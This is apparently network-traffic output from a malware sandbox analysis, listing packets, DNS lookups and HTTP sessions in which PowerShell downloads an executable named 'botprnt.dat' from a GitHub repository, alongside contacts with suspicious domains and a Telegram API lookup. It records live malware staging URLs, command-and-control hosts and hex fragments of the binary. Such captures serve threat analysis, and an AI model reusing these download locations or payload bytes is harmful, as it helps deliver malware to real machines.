                                                                                                                                                                              Oct 30, 2024 11:30:49.581264019 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.433643103 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.433773041 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.451531887 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.451565981 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.452512980 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.461103916 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.503354073 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.708070040 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.709428072 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.709497929 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.709528923 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.709578991 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.709676027 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.709769964 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.710128069 CET50014443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:50.710155010 CET44350014140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.713845015 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:50.713948965 CET44350017185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:50.714056015 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:50.714539051 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:50.714596033 CET44350017185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:51.363204002 CET44350017185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:51.363297939 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:51.364672899 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:51.364731073 CET44350017185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:51.364820004 CET50017443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:56.737302065 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:56.737401009 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:56.737474918 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:56.738116026 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:56.738143921 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.359371901 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.359627962 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:57.360914946 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:57.360930920 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.361696959 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.362133980 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:57.407332897 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.573755980 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.573930979 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.574001074 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:57.575059891 CET50020443192.168.2.5185.199.111.133
                                                                                                                                                                              Oct 30, 2024 11:30:57.575088978 CET44350020185.199.111.133192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.578073025 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:57.584384918 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:57.584462881 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:57.584531069 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:57.590037107 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.405534983 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.406712055 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:58.412210941 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.645811081 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.650201082 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:58.655647039 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.891498089 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.891791105 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.892211914 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:58.892916918 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:58.892993927 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:58.898307085 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:58.898442984 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.137984037 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.190079927 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:59.342636108 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:59.348675966 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.582839012 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.589024067 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:30:59.594475985 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.830265045 CET543250021188.116.21.204192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.832259893 CET50024443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:59.832350016 CET44350024140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.832433939 CET50024443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:59.846616983 CET50024443192.168.2.5140.82.121.4
                                                                                                                                                                              Oct 30, 2024 11:30:59.846668959 CET44350024140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:59.877693892 CET500215432192.168.2.5188.116.21.204
                                                                                                                                                                              Oct 30, 2024 11:31:00.702334881 CET44350024140.82.121.4192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:31:00.702423096 CET50024443192.168.2.5140.82.121.4
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 30, 2024 11:28:55.643667936 CET5129353192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:28:55.653645039 CET53512931.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:28:56.926748991 CET5754853192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:28:56.934545040 CET53575481.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:47.188235044 CET6407153192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:29:47.196253061 CET53640711.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:29:58.414280891 CET6436753192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:29:58.427849054 CET53643671.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:01.269011974 CET5549653192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:01.279233932 CET53554961.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:07.691931009 CET5256853192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:07.720891953 CET53525681.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:19.426656961 CET6147653192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:19.862210035 CET53614761.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:27.136976957 CET5315653192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:27.148741961 CET53531561.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:32.176522970 CET5232653192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:32.185658932 CET53523261.1.1.1192.168.2.5
                                                                                                                                                                              Oct 30, 2024 11:30:43.689791918 CET6099853192.168.2.51.1.1.1
                                                                                                                                                                              Oct 30, 2024 11:30:43.698120117 CET53609981.1.1.1192.168.2.5
                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 30, 2024 11:28:55.643667936 CET192.168.2.51.1.1.10x9a69Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:28:56.926748991 CET192.168.2.51.1.1.10x5baaStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:29:47.188235044 CET192.168.2.51.1.1.10x8ddaStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:29:58.414280891 CET192.168.2.51.1.1.10xd516Standard query (0)rootunvbot.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:01.269011974 CET192.168.2.51.1.1.10x5382Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:07.691931009 CET192.168.2.51.1.1.10x6658Standard query (0)unvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:19.426656961 CET192.168.2.51.1.1.10xc97dStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:27.136976957 CET192.168.2.51.1.1.10x4ffdStandard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:32.176522970 CET192.168.2.51.1.1.10xb2fcStandard query (0)rootunvdwl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:43.689791918 CET192.168.2.51.1.1.10x5546Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 30, 2024 11:28:55.653645039 CET1.1.1.1192.168.2.50x9a69No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:28:56.934545040 CET1.1.1.1192.168.2.50x5baaNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:28:56.934545040 CET1.1.1.1192.168.2.50x5baaNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:28:56.934545040 CET1.1.1.1192.168.2.50x5baaNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:28:56.934545040 CET1.1.1.1192.168.2.50x5baaNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:29:47.196253061 CET1.1.1.1192.168.2.50x8ddaNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:29:58.427849054 CET1.1.1.1192.168.2.50xd516No error (0)rootunvbot.com188.116.21.204A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:01.279233932 CET1.1.1.1192.168.2.50x5382No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:07.720891953 CET1.1.1.1192.168.2.50x6658No error (0)unvdwl.com194.26.192.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:19.862210035 CET1.1.1.1192.168.2.50xc97dNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:19.862210035 CET1.1.1.1192.168.2.50xc97dNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 30, 2024 11:30:43.698120117 CET1.1.1.1192.168.2.50x5546No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                              • github.com
                                                                                                                                                                              • raw.githubusercontent.com
                                                                                                                                                                              • api.telegram.org
                                                                                                                                                                              • ipinfo.io
                                                                                                                                                                              • dns.google
                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549988194.26.192.52804672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 11:30:07.740895987 CET70OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                              Host: unvdwl.com
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Oct 30, 2024 11:30:08.594388008 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:08 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: keep-alive


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.549991194.26.192.52804672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 11:30:13.606014967 CET70OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                              Host: unvdwl.com
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Oct 30, 2024 11:30:14.420259953 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:14 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: keep-alive


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.549998194.26.192.52804672C:\Windows\System32\svchost.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 30, 2024 11:30:26.302742004 CET73OUTHEAD /un2/urestorehard.dat HTTP/1.1
                                                                                                                                                                              Host: 194.26.192.52
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Oct 30, 2024 11:30:27.129399061 CET164INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx/1.22.0 (Ubuntu)
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:30:27 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                              Connection: keep-alive


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.549704140.82.121.44432124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:28:56 UTC99OUTGET /unvd01/unvmain/raw/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                              Host: github.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-30 10:28:56 UTC550INHTTP/1.1 302 Found
                                                                                                                                                                              Server: GitHub.com
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:28:56 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                              Access-Control-Allow-Origin:
                                                                                                                                                                              Location: https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.dat
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              2024-10-30 10:28:56 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                              Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.549705185.199.111.1334432124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-30 10:28:57 UTC110OUTGET /unvd01/unvmain/main/un2/botprnt.dat HTTP/1.1
                                                                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-30 10:28:58 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 14624256
                                                                                                                                                                              Cache-Control: max-age=300
                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "f4d8cfe73e7f39bfc4f66ada62827442d3463c999dbe4bc834706599aff4abe7"
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              X-GitHub-Request-Id: B316:3EDD8B:73BC54:7F84B1:67220A67
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Wed, 30 Oct 2024 10:28:58 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-dfw-kdfw8210161-DFW
                                                                                                                                                                              X-Cache: MISS
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1730284138.632365,VS0,VE418
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: c03f9d1466cd24ca09de81bd59245ee889426697
                                                                                                                                                                              Expires: Wed, 30 Oct 2024 10:33:58 GMT
                                                                                                                                                                              Source-Age: 0
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b8 08 21 67 00 00 00 00 00 00 00 00 f0 00 2e 22 0b 02 02 27 00 42 00 00 00 22 df 00 00 02 00 00 20 13 00 00 00 10 00 00 00 00 85 45 03 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 b0 df 00 00 04 00 00 bc 4f df 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd!g."'B" EO`
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 00 00 00 eb 81 66 0f 1f 84 00 00 00 00 00 31 c0 48 87 03 eb 9c 66 0f 1f 84 00 00 00 00 00 48 8b 15 c9 1b df 00 c7 06 01 00 00 00 48 8b 0d ac 1b df 00 e8 9f 3c 00 00 e9 66 ff ff ff 66 90 48 8b 15 89 1b df 00 48 8b 0d 72 1b df 00 e8 85 3c 00 00 c7 06 02 00 00 00 e9 51 ff ff ff 66 90 b9 1f 00 00 00 e8 86 3a 00 00 e9 35 ff ff ff 90 41 54 55 57 56 53 48 83 ec 20 4c 8b 25 0f 1b df 00 85 d2 48 89 ce 89 d3 41 89 14 24 4c 89 c7 75 47 8b 05 21 3e df 00 85 c0 74 5f e8 d0 2e 00 00 49 89 f8 89 da 48 89 f1 e8 c9 2a 00 00 89 c5 85 db 0f 84 b1 00 00 00 83 fb 03 0f 84 a8 00 00 00 89 e8 41 c7 04 24 ff ff ff ff 48 83 c4 20 5b 5e 5f 5d 41 5c c3 0f 1f 00 e8 93 2e 00 00 8d 43 ff 49 89 f8 89 da 83 f8 01 48 89 f1 0f 87 a7 00 00 00 e8 ba fd ff ff 85 c0 75 06 31 ed eb c2 66 90 49
                                                                                                                                                                              Data Ascii: f1HfHH<ffHHr<Qf:5ATUWVSH L%HA$LuG!>t_.IH*A$H [^_]A\.CIHu1fI
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: ff ff 88 45 f1 0f b6 45 f2 0f b6 c0 89 c1 e8 99 fc ff ff 88 45 f2 0f b6 55 ef 8b 45 fc c1 e8 02 89 c1 48 8d 05 33 0b df 00 0f b6 04 01 31 d0 88 45 ef 8b 45 fc c1 e0 02 89 45 f8 8b 45 fc 83 e8 04 c1 e0 02 89 45 f4 8b 45 f4 48 8b 55 10 48 01 d0 44 0f b6 00 0f b6 4d ef 8b 45 f8 48 8b 55 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 01 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f0 8b 45 f8 83 c0 01 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 02 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f1 8b 45 f8 83 c0 02 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 8b 45 f4 83 c0 03 89 c2 48 8b 45 10 48 01 d0 44 0f b6 00 0f b6 4d f2 8b 45 f8 83 c0 03 89 c2 48 8b 45 10 48 01 c2 44 89 c0 31 c8 88 02 83 45 fc 01 83 7d fc 2b 0f 86 47 fe ff ff
                                                                                                                                                                              Data Ascii: EEEUEH31EEEEEEHUHDMEHUHD1EHEHDMEHEHD1EHEHDMEHEHD1EHEHDMEHEHD1E}+G
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 89 d0 48 89 c2 b9 0a 00 00 00 e8 ed fb ff ff c6 45 ff 09 48 8b 45 10 48 89 c1 e8 87 fc ff ff 48 8b 45 10 48 89 c1 e8 5e fd ff ff 0f b6 45 ff 48 8b 4d 18 48 8b 55 10 49 89 c8 89 c1 e8 bb fb ff ff 80 7d ff 00 74 12 48 8b 45 10 48 89 c1 e8 b8 fd ff ff 80 6d ff 01 eb ba 90 90 48 83 c4 30 5d c3 55 56 53 48 83 ec 30 48 8d 6c 24 30 48 89 4d 20 c6 45 ff 00 eb 5c c6 45 fe 00 eb 4c 0f b6 45 fe 0f b6 55 ff 48 8b 4d 20 48 63 d2 48 98 48 c1 e0 02 48 01 c8 48 01 d0 0f b6 00 0f b6 c0 0f b6 5d fe 0f b6 75 ff 89 c1 e8 9d f6 ff ff 89 c2 4c 8b 45 20 48 63 ce 48 63 c3 48 c1 e0 02 4c 01 c0 48 01 c8 88 10 80 45 fe 01 80 7d fe 03 76 ae 80 45 ff 01 80 7d ff 03 76 9e 90 90 48 83 c4 30 5b 5e 5d c3 55 48 89 e5 48 83 ec 10 48 89 4d 10 48 8b 45 10 0f b6 40 01 88 45 ff 48 8b 45 10 0f
                                                                                                                                                                              Data Ascii: HEHEHHEH^EHMHUI}tHEHmH0]UVSH0Hl$0HM E\ELEUHM HcHHHH]uLE HcHcHLHE}vE}vH0[^]UHHHMHE@EHE
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: 00 00 48 8b 45 18 48 89 c1 e8 35 f6 ff ff 48 8b 45 10 48 8d 88 b0 00 00 00 48 8d 45 e0 41 b8 10 00 00 00 48 89 c2 e8 06 f3 ff ff 48 83 45 18 10 48 83 45 f8 10 48 8b 45 f8 48 3b 45 20 72 92 90 90 48 83 c4 40 5d c3 55 48 89 e5 48 83 ec 30 48 89 4d 10 48 89 55 18 4c 89 45 20 48 83 7d 10 00 0f 84 ad 00 00 00 48 8b 45 10 48 8b 40 08 48 85 c0 0f 85 9c 00 00 00 48 83 7d 20 00 0f 84 91 00 00 00 48 8b 45 20 48 83 c0 01 01 c0 66 89 45 fe 0f b7 45 fe 48 89 c1 e8 54 2c 00 00 48 89 c2 48 8b 45 10 48 89 50 08 48 8b 45 10 48 8b 40 08 48 85 c0 75 07 b8 ff ff ff ff eb 5d 0f b7 55 fe 48 8b 45 10 48 8b 40 08 49 89 d0 ba 00 00 00 00 48 89 c1 e8 21 2b 00 00 0f b7 4d fe 48 8b 45 10 48 8b 40 08 48 8b 55 18 49 89 c8 48 89 c1 e8 d6 2b 00 00 0f b7 45 fe 8d 50 fe 48 8b 45 10 66 89
                                                                                                                                                                              Data Ascii: HEH5HEHHEAHHEHEHEH;E rH@]UHH0HMHULE H}HEH@HH} HE HfEEHT,HHEHPHEH@Hu]UHEH@IH!+MHEH@HUIH+EPHEf
                                                                                                                                                                              2024-10-30 10:28:58 UTC1378INData Raw: c7 85 34 01 00 00 30 00 00 00 8b 85 34 01 00 00 65 48 8b 00 48 89 85 28 01 00 00 48 8b 85 28 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 88 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 4c 8b 0d f8 28 df 00 c7 85 24 01 00 00 30 00 00 00 8b 85 24 01 00 00 65 48 8b 00 48 89 85 18 01 00 00 48 8b 85 18 01 00 00 48 8b 40 60 48 8b 40 30 48 8b 95 90 01 00 00 49 89 d0 ba 00 00 00 00 48 89 c1 41 ff d1 48 8b 15 c2 28 df 00 48 8b 85 90 00 00 00 48 89 c1 ff d2 8b 85 9c 01 00 00 e9 f3 04 00 00 4c 8b 0d 8c 28 df 00 c7 85 14 01 00 00 30 00 00 00 8b 85 14 01 00 00 65 48 8b 00 48 89 85 08 01 00 00 48 8b 85 08 01 00 00 48 8b 40 60 48 8b 40 30 41 b8 c8 00 00 00 ba 08 00 00 00 48 89 c1 41 ff d1 48 89 85 78 01 00 00 48 83 bd 78 01 00 00 00 0f 85 f0 00 00 00 4c 8b 0d 3d 28
                                                                                                                                                                              Data Ascii: 404eHH(H(H@`H@0HIHAL($0$eHHHH@`H@0HIHAH(HHL(0eHHHH@`H@0AHAHxHxL=(
